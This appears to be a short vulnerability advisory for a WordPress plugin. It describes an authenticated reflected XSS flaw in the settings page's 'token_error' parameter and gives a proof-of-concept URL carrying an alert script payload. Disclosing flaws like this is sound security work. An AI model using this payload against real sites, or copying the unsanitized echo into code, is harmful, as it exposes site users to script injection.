The plugin allowed Authenticated Reflected XSS in the plugin settings page as the ‘token_error’ parameter can be controlled by users and it is directly echoed without being sanitized
/wp-admin/admin.php?page=settings-wisw&token_error=<script>alert(/XSS/);</script>